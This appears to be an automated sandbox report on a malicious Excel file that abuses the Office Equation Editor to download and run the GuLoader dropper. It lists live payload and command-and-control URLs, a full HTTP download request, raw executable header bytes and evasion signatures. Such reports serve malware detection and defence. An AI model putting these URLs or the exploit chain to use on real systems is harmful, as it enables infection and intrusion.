Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TransportLabel_6170453602.xlsx

Overview

General Information

Sample Name:TransportLabel_6170453602.xlsx
Analysis ID:624947
MD5:1db66b406376f18434e1c02cbcf5c5e5
SHA1:35741ca39d0d76a00fac1eaa720101d7bfd82cc5
SHA256:a561efadb6bab1e3d4f5b0cdefaecc0c4afb382bfe3bde81e1dad0aefc76695c
Tags:VelvetSweatshopxlsx
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
PE file contains more sections than normal
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2452 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2156 cmdline: "C:\Users\Public\vbc.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)
  • cleanup
{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.149.13.182, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
    Source: TransportLabel_6170453602.xlsxReversingLabs: Detection: 39%
    Source: http://103.149.13.182/msdrive10/.svchost.exeAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeMetadefender: Detection: 14%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeReversingLabs: Detection: 23%

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.149.13.182 Port: 80Jump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406850 FindFirstFileW,FindClose,4_2_00406850
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C26
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357051B ShellExecuteExW,ExitProcess,2_2_0357051B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035704BA URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035704BA
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035703C5 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035703C5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0357044F URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_0357044F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570390 ExitProcess,2_2_03570390
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570504 ShellExecuteExW,ExitProcess,2_2_03570504
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570539 ExitProcess,2_2_03570539
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035703A9 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035703A9
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80
    Source: excel.exeMemory has grown: Private usage: 8MB later: 62MB

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://barsam.com.au/bin_QuCucbUMda229.bin
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 May 2022 07:27:56 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 10 May 2022 23:41:34 GMTETag: "4fcbf-5deb0dd783b2f"Accept-Ranges: bytesContent-Length: 326847Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /msdrive10/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.13.182
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exe
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exeigh
    Source: EQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exej
    Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exemmC:
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
    Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drString found in binary or memory: https://sectigo.com/CPS0C
    Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE386947.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03570435
    Source: global trafficHTTP traffic detected: GET /msdrive10/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004056BB

    System Summary

    barindex
    Source: Screenshot number: 8Screenshot OCR: document is protected 17 18 ~ 19 20 ~ m p 21 e m m 22 23 0 , G) Open the document In If thi
    Source: Screenshot number: 8Screenshot OCR: protected documents the yellow bar above 26 27 28 0 q 29 Nr g I , )) -: .- .b > " 35 36
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040350A
    Source: C:\Users\Public\vbc.exeCode function: 4_2_734F1BFF4_2_734F1BFF
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: .svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: wxbase30u_xml_gcc_custom.dll.4.drStatic PE information: Number of sections : 12 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: TransportLabel_6170453602.xlsxReversingLabs: Detection: 39%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040350A
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TransportLabel_6170453602.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR581D.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/26@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404967
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
